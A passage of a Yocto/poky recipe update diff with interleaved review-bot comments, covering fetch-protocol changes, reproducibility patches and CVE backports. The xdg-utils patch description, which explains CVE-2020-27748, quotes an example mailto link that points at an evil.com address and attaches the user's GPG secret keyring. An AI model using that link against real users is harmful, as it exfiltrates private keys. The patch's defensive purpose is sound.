@@ -0,0 +1,26 @@ +From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex@linutronix.de> +Date: Sat, 23 Oct 2021 20:20:59 +0200 +Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage. + +This helps reproducibility. + +Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156] +Signed-off-by: Alexander Kanavin <alex@linutronix.de> +--- + Makefile | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/Makefile b/Makefile +index 886018f9..f4290f9c 100644 +--- a/Makefile ++++ b/Makefile +@@ -412,7 +412,7 @@ git-commit-id.h: + $(OBJS): stress-ng.h Makefile + + stress-ng.1.gz: stress-ng.1 +- gzip -c $< > $@ ++ gzip -n -c $< > $@ + + .PHONY: dist + dist: diff --git a/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb b/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb index 9b987c7bde..cf94e0275b 100644 --- a/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb +++ b/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb @@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \ +SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \ file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \ + file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \ " -SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae" -SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0" +SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596" +S = "${WORKDIR}/git" DEPENDS = "coreutils-native" diff --git a/poky/meta/recipes-extended/sysklogd/sysklogd.inc b/poky/meta/recipes-extended/sysklogd/sysklogd.inc index 8899daa1b0..e45b256bbe 100644 --- a/poky/meta/recipes-extended/sysklogd/sysklogd.inc 
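Review bot: The new `SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596"` in stress-ng_0.11.17.bb carries no indication of which upstream release it corresponds to, while the same hunk drops the `SRC_URI[md5sum]` and `SRC_URI[sha256sum]` values of the 0.11.17 tarball. After this change the commit id is the only thing that pins the source, so someone auditing the recipe should be able to see that it is the 0.11.17 release commit. Other recipes in this update do that with a comment (`#SRCREV for 1.12` in libmatchbox). I would add a line such as `# SRCREV is the upstream commit tagged for ${PV}` above it, after confirming that against the upstream tag.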
+++ b/poky/meta/recipes-extended/sysklogd/sysklogd.inc @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \ inherit update-rc.d update-alternatives systemd autotools -SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \ +SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \ file://sysklogd \ file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \ " diff --git a/poky/meta/recipes-extended/tar/tar_1.32.bb b/poky/meta/recipes-extended/tar/tar_1.32.bb index 0fe0b801c2..db1540dbd6 100644 --- a/poky/meta/recipes-extended/tar/tar_1.32.bb +++ b/poky/meta/recipes-extended/tar/tar_1.32.bb @@ -66,5 +66,6 @@ NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}" BBCLASSEXTEND = "native nativesdk" -# These are both specific to the NPM package node-tar -CVE_CHECK_WHITELIST += "CVE-2021-32803 CVE-2021-32804" +# Avoid false positives from CVEs in node-tar package +# For example CVE-2021-{32803,32804,37701,37712,37713} +CVE_PRODUCT = "gnu:tar" diff --git a/poky/meta/recipes-extended/timezone/timezone.inc b/poky/meta/recipes-extended/timezone/timezone.inc index a89560b424..e9eb249afe 100644 --- a/poky/meta/recipes-extended/timezone/timezone.inc +++ b/poky/meta/recipes-extended/timezone/timezone.inc @@ -6,7 +6,7 @@ SECTION = "base" LICENSE = "PD & BSD & BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" -PV = "2021a" +PV = "2021e" SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \ http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \ 
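Review bot: Replacing the two-entry `CVE_CHECK_WHITELIST` with `CVE_PRODUCT = "gnu:tar"` in tar_1.32.bb changes what the CVE check can report, not only what it suppresses, and the new comment mentions only the false-positive side. With a vendor-qualified product, entries for tar recorded under any other vendor string are no longer matched, so a GNU tar CVE filed that way would drop out of the report without notice. I have not checked the database for such entries. I would extend the comment, e.g. `# Matches only vendor "gnu"; re-check if GNU tar CVEs appear under another vendor`.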
@@ -14,5 +14,6 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" -SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0" -SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08" +SRC_URI[tzcode.sha256sum] = "584666393a5424d13d27ec01183da17703273664742e049d4f62f62dab631775" +SRC_URI[tzdata.sha256sum] = "07ec42b737d0d3c6be9c337f8abb5f00554a0f9cc4fcf01a703d69403b6bb2b1" + diff --git a/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 0000000000..948b9e22e9 --- /dev/null +++ b/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch 
@@ -0,0 +1,58 @@ +From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> +Date: Tue, 18 Aug 2020 16:52:24 +0100 +Subject: [PATCH] xdg-email: remove attachment handling from mailto +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows attacker to extract secrets from users: + +mailto:sid@evil.com?attach=/.gnupg/secring.gpg + +See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 +and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 + +Signed-off-by: Jörg Thalheim <joerg@thalheim.io> +--- + scripts/xdg-email.in | 7 +------ + 1 file changed, 1 insertion(+), 6 deletions(-) + +Upstream-Status: Backport +CVE: CVE-2020-27748 + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 6db58ad..5d2f4f3 100644 +--- a/scripts/xdg-email.in ++++ b/scripts/xdg-email.in +@@ -32,7 +32,7 @@ _USAGE + + run_thunderbird() + { +- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH ++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY + THUNDERBIRD="$1" + MAILTO=$(echo "$2" | sed 's/^mailto://') + echo "$MAILTO" | grep -qs "^?" +@@ -48,7 +48,6 @@ run_thunderbird() + BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) + SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) + BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) + + if [ -z "$TO" ] ; then + NEWMAILTO= +@@ -68,10 +67,6 @@ run_thunderbird() + NEWMAILTO="${NEWMAILTO},$BODY" + fi + +- if [ -n "$ATTACH" ] ; then +- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" +- fi +- + NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') + DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" + "$THUNDERBIRD" -compose "$NEWMAILTO" +-- +GitLab + 
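Review bot: The header of 1f199813e0eb0246f63b54e9e154970e609575af.patch gives `Upstream-Status: Backport` with no reference to the upstream commit, and the file is named after the commit hash rather than the CVE it fixes. The other CVE patches in this update are named `CVE-2021-3200.patch` and `CVE-2021-20240.patch`, and the gdk-pixbuf one carries the upstream URL in brackets, which makes it easier to audit which CVEs a recipe has patched. I would rename the file to `CVE-2020-27748.patch` and write `Upstream-Status: Backport [<upstream commit URL>]`. The inner hunks touch only run_thunderbird(); whether other handlers in xdg-email.in also act on an `attach=` field is not visible here and is worth confirming against upstream.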
diff --git a/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index d371c5c28c..41b74b8598 100644 --- a/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb @@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014" SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ file://0001-Reinstate-xdg-terminal.patch \ file://0001-Don-t-build-the-in-script-manual.patch \ + file://1f199813e0eb0246f63b54e9e154970e609575af.patch \ " SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" diff --git a/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb index da81867115..765a34e842 100644 --- a/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb +++ b/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb @@ -13,7 +13,7 @@ PR = "r2" # Blacklist a bogus tag in upstream check UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)" -SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \ +SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \ file://xinetd.init \ file://xinetd.conf \ file://xinetd.default \ diff --git a/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch new file mode 100644 index 0000000000..fe594b24bb --- /dev/null +++ b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch 
@@ -0,0 +1,40 @@ +From 086e8adf4cc352cd11572f96066b001b545f354e Mon Sep 17 00:00:00 2001 +From: Emmanuele Bassi <ebassi@gnome.org> +Date: Wed, 1 Apr 2020 18:11:55 +0100 +Subject: [PATCH] Check the memset length argument + +Avoid overflows by using the checked multiplication macro for gsize. + +Fixes: #132 + +Upstream-Status: Backported [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e] +CVE: CVE-2021-20240 + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + gdk-pixbuf/io-gif-animation.c | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c +index c9db3c66e..49674fd2e 100644 +--- a/gdk-pixbuf/io-gif-animation.c ++++ b/gdk-pixbuf/io-gif-animation.c +@@ -412,11 +412,15 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter) + + /* If no rendered frame, render the first frame */ + if (anim->last_frame == NULL) { ++ gsize len = 0; + if (anim->last_frame_data == NULL) + anim->last_frame_data = gdk_pixbuf_new (GDK_COLORSPACE_RGB, TRUE, 8, anim->width, anim->height); + if (anim->last_frame_data == NULL) + return NULL; +- memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, gdk_pixbuf_get_rowstride (anim->last_frame_data) * anim->height); ++ if (g_size_checked_mul (&len, gdk_pixbuf_get_rowstride (anim->last_frame_data), anim->height)) ++ memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, len); ++ else ++ return NULL; + composite_frame (anim, g_list_nth_data (anim->frames, 0)); + } + +-- +GitLab diff --git a/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb index 54861e83c6..60a04c3581 100644 --- a/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb +++ b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb 
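Review bot: The patch header uses `Upstream-Status: Backported [...]`, whereas the other backports added in this update write `Upstream-Status: Backport`; tooling that checks the tag against a fixed set of status values may not recognise the variant. I would change it to `Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e]`. On the code itself, the new `else return NULL;` branch in gdk_pixbuf_gif_anim_iter_get_pixbuf() depends on callers handling a NULL pixbuf, which the existing `return NULL` two lines above suggests they already do. The rest of the function is outside the inner hunk.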
@@ -25,6 +25,7 @@ SRC_URI = "${GNOME_MIRROR}/${BPN}/${MAJ_VER}/${BPN}-${PV}.tar.xz \ file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \ file://missing-test-data.patch \ file://CVE-2020-29385.patch \ + file://CVE-2021-20240.patch \ " SRC_URI_append_class-target = " \ diff --git a/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb b/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb index 92b0d1d52f..0842f10ea9 100644 --- a/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb +++ b/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb @@ -102,7 +102,7 @@ EOF # from the target sysroot. cat > ${B}/g-ir-scanner-wrapper << EOF #!/bin/sh -# This prevents g-ir-scanner from writing cache data to $HOME +# This prevents g-ir-scanner from writing cache data to user's HOME dir export GI_SCANNER_DISABLE_CACHE=1 g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@" diff --git a/poky/meta/recipes-graphics/glew/glew/notempdir.patch b/poky/meta/recipes-graphics/glew/glew/notempdir.patch new file mode 100644 index 0000000000..8d79ce0cdf --- /dev/null +++ b/poky/meta/recipes-graphics/glew/glew/notempdir.patch 
@@ -0,0 +1,19 @@ +We don't use the dist-* targets and hence DIST_DIR isn't used. The current code +creates a new temp directory in /tmp/ for every invocation of make. Lets +not do that. + +Upstream-Status: Pending [a revised version would be needed for upstream] +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> + +Index: glew-2.2.0/Makefile +=================================================================== +--- glew-2.2.0.orig/Makefile ++++ glew-2.2.0/Makefile +@@ -56,7 +56,6 @@ DIST_SRC_ZIP ?= $(shell pwd)/$(DIST_NAME + DIST_SRC_TGZ ?= $(shell pwd)/$(DIST_NAME).tgz + DIST_WIN32 ?= $(shell pwd)/$(DIST_NAME)-win32.zip + +-DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME) + + # To disable stripping of linked binaries either: + # - use STRIP= on gmake command-line diff --git a/poky/meta/recipes-graphics/glew/glew_2.2.0.bb b/poky/meta/recipes-graphics/glew/glew_2.2.0.bb index 92b6083648..d7a26a3438 100644 --- a/poky/meta/recipes-graphics/glew/glew_2.2.0.bb +++ b/poky/meta/recipes-graphics/glew/glew_2.2.0.bb @@ -7,6 +7,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2" SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \ file://0001-Fix-build-race-in-Makefile.patch \ + file://notempdir.patch \ file://no-strip.patch" SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7" diff --git a/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb b/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb index ab6f5ac9ed..33ea6fe5a9 100644 --- a/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb +++ b/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb @@ -13,7 +13,7 @@ SECTION = "x11/wm" SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40" PV = "0.3+git${SRCPV}" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" S = "${WORKDIR}/git" 
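Review bot: Removing `DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME)` leaves DIST_DIR undefined for any rule that still expands it, and the patch does not touch those rules. The description says the dist-* targets are unused in this build, but if one is ever invoked, `$(DIST_DIR)` expands to the empty string and paths built from it would resolve somewhere unintended. Those rules are outside the hunk, so I cannot tell what they do with it. A comment at the removed line, e.g. `# DIST_DIR intentionally unset: dist-* targets must not be used with this patch`, would make the constraint visible.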
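Review bot: The updated `SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"` in libfakekey_git.bb gains a branch but no `protocol=https`, so the fetch stays on the unauthenticated git:// transport while the github.com recipes in this same update were moved to https. The pinned SRCREV limits what a tampered transfer could achieve, but for consistency I would write `git://git.yoctoproject.org/${BPN};branch=master;protocol=https`, assuming the server offers https for these repositories. The libmatchbox_1.12.bb and matchbox-wm_1.2.2.bb hunks that follow have the same form.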
diff --git a/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb b/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb index 1a31677978..06bd682823 100644 --- a/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb +++ b/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb @@ -17,7 +17,7 @@ DEPENDS = "virtual/libx11 libxext" #SRCREV for 1.12 SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb b/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb index 03b38027a1..f14ed0f52b 100644 --- a/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb +++ b/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb @@ -14,7 +14,7 @@ SECTION = "x11" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e" -SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch" +SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch;protocol=https" SRCREV = "8ea1eba433dcbceb0e5dcb54b8e3f984987f7a17" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb b/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb index a08eb252ce..3ea67d09d6 100644 --- a/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb +++ b/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb @@ -12,7 +12,7 @@ DEPENDS = "libmatchbox virtual/libx11 libxext libxrender startup-notification ex # SRCREV tagged 1.2.2 SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970" -SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager \ +SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager;branch=master \ file://0001-Fix-build-with-gcc-10.patch \ file://kbdconfig" diff --git a/poky/meta/recipes-graphics/mesa/mesa.inc b/poky/meta/recipes-graphics/mesa/mesa.inc index a1bf878b1a..bfab19e773 100644 
--- a/poky/meta/recipes-graphics/mesa/mesa.inc +++ b/poky/meta/recipes-graphics/mesa/mesa.inc @@ -231,7 +231,7 @@ python mesa_populate_packages() { import re dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri") if os.path.isdir(dri_drivers_root): - dri_pkgs = os.listdir(dri_drivers_root) + dri_pkgs = sorted(os.listdir(dri_drivers_root)) lib_name = d.expand("${MLPREFIX}mesa-megadriver") for p in dri_pkgs: m = re.match(r'^(.*)_dri\.so$', p) diff --git a/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb b/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb index 58a6997ffe..88101b5dcc 100644 --- a/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb +++ b/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb @@ -7,7 +7,7 @@ PV = "1.4.7+git${SRCPV}" # Exclude x.99.x versions from upstream checks UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>^\d+(\.(?!99)\d+)+)" -SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4 \ +SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https \ file://fix-test-includes.patch \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch new file mode 100644 index 0000000000..caa48e088d --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch 
@@ -0,0 +1,27 @@ +From d623e9797b7ee9b3739a8a4afe1a01f7e03754aa Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex.kanavin@gmail.com> +Date: Sun, 1 Nov 2020 20:08:49 +0000 +Subject: [PATCH] Add a missing include for htobe32 definition + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> +--- + tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c | 2 ++ + 1 file changed, 2 insertions(+) + +diff --git a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c +index 5f45e0c23..c755ee29a 100644 +--- a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c ++++ b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c +@@ -34,6 +34,8 @@ + + #include "piglit-util-gl.h" + ++#include <endian.h> ++ + #define IMAGE_WIDTH 60 + #define IMAGE_HEIGHT 60 + +-- +2.17.1 + diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch new file mode 100644 index 0000000000..cc9482c047 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch 
@@ -0,0 +1,31 @@ +From 9086d42df1f3134bafcfe33ff16db7bbb9d9a0fd Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex.kanavin@gmail.com> +Date: Mon, 30 Nov 2020 23:08:22 +0000 +Subject: [PATCH] framework/profile.py: make test lists reproducible + +These are created with os.walk, which yields different +order depending on where it's run. + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> +--- + framework/profile.py | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +diff --git a/framework/profile.py b/framework/profile.py +index c210e535e..9b5d51d68 100644 +--- a/framework/profile.py ++++ b/framework/profile.py +@@ -528,7 +528,11 @@ class TestProfile(object): + else: + opts[n] = self.test_list[n] + else: +- opts = self.test_list # pylint: disable=redefined-variable-type ++ opts = collections.OrderedDict() ++ test_keys = list(self.test_list.keys()) ++ test_keys.sort() ++ for k in test_keys: ++ opts[k] = self.test_list[k] + + for k, v in self.filters.run(opts.items()): + yield k, v diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch new file mode 100644 index 0000000000..8704f98500 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch 
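Review bot: The five lines added to the else branch in framework/profile.py build the sorted copy by hand, and a single statement says the same thing: `opts = collections.OrderedDict((k, self.test_list[k]) for k in sorted(self.test_list.keys()))`. Note also that `opts` used to be the same object as `self.test_list` and is now a copy. The lines shown only iterate it, so that looks harmless, but the enclosing method starts outside the hunk and the earlier part is not visible.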
@@ -0,0 +1,44 @@
+From 1b23539aece156f6fe0789cb988f22e5915228f6 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:12:32 +0000
+Subject: [PATCH 1/2] generated_tests/gen_tcs/tes_input_tests.py: do not
+ hardcode the full binary path
+
+This helps reproducibility.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ generated_tests/gen_tcs_input_tests.py | 2 +-
+ generated_tests/gen_tes_input_tests.py | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/generated_tests/gen_tcs_input_tests.py b/generated_tests/gen_tcs_input_tests.py
+index face4f19a..e36671af4 100644
+--- a/generated_tests/gen_tcs_input_tests.py
++++ b/generated_tests/gen_tcs_input_tests.py
+@@ -272,7 +272,7 @@ class Test(object):
+ relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+ """)
+
+- test = test.format(self=self, generator_command=" ".join(sys.argv))
++ test = test.format(self=self, generator_command="generated_tests/gen_tcs_input_tests.py")
+
+ filename = self.filename()
+ dirname = os.path.dirname(filename)
+diff --git a/generated_tests/gen_tes_input_tests.py b/generated_tests/gen_tes_input_tests.py
+index 3d847b5cc..954840b20 100644
+--- a/generated_tests/gen_tes_input_tests.py
++++ b/generated_tests/gen_tes_input_tests.py
+@@ -301,7 +301,7 @@ class Test(object):
+ relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+ """)
+
+- test = test.format(self=self, generator_command=" ".join(sys.argv))
++ test = test.format(self=self, generator_command="generated_tests/gen_tes_input_tests.py")
+
+ filename = self.filename()
+ dirname = os.path.dirname(filename)
+--
+2.17.1
+
diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
new file mode 100644
index 0000000000..2efba6f866
--- /dev/null
+++ b/poky/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
@@ -0,0 +1,30 @@
+From 1919bb7f4072d73dcbb64d0e06eff5b04529c3db Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 16 Nov 2020 18:01:02 +0000
+Subject: [PATCH] serializer.py: make .gz files reproducible
+
+.gz format contains mtime of the compressed data, and
+SOURCE_DATE_EPOCH is the standard way to make it reproducuble.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/serializer.py | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tests/serializer.py b/tests/serializer.py
+index bd14bc3db..bc5b45d7f 100644
+--- a/tests/serializer.py
++++ b/tests/serializer.py
+@@ -138,7 +138,10 @@ def serializer(name, profile, outfile):
+ et.SubElement(env, 'env', name=k, value=v)
+
+ tree = et.ElementTree(root)
+- with gzip.open(outfile, 'wb') as f:
++ reproducible_mtime = None
++ if 'SOURCE_DATE_EPOCH' in os.environ:
++ reproducible_mtime=os.environ['SOURCE_DATE_EPOCH']
++ with gzip.GzipFile(outfile, 'wb', mtime=reproducible_mtime) as f:
+ tree.write(f, encoding='utf-8', xml_declaration=True)
+
+
diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
new file mode 100644
index 0000000000..8321be8490
--- /dev/null
+++ b/poky/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
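Review bot: `reproducible_mtime` is assigned the raw string from `os.environ['SOURCE_DATE_EPOCH']`, so `gzip.GzipFile` receives a string where its `mtime` argument is documented as a numeric timestamp. Convert and validate where the variable is read, `reproducible_mtime = int(os.environ['SOURCE_DATE_EPOCH'])`, so a malformed value in the build environment fails with a clear error at this line rather than inside the gzip header writer. The added lines also depend on `os` already being imported in tests/serializer.py, which the hunk does not show. The body of `serializer()` starts outside the hunk.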
@@ -0,0 +1,28 @@
+From 5bf89c6a314952313b2b762fff0d5501fe57ac53 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
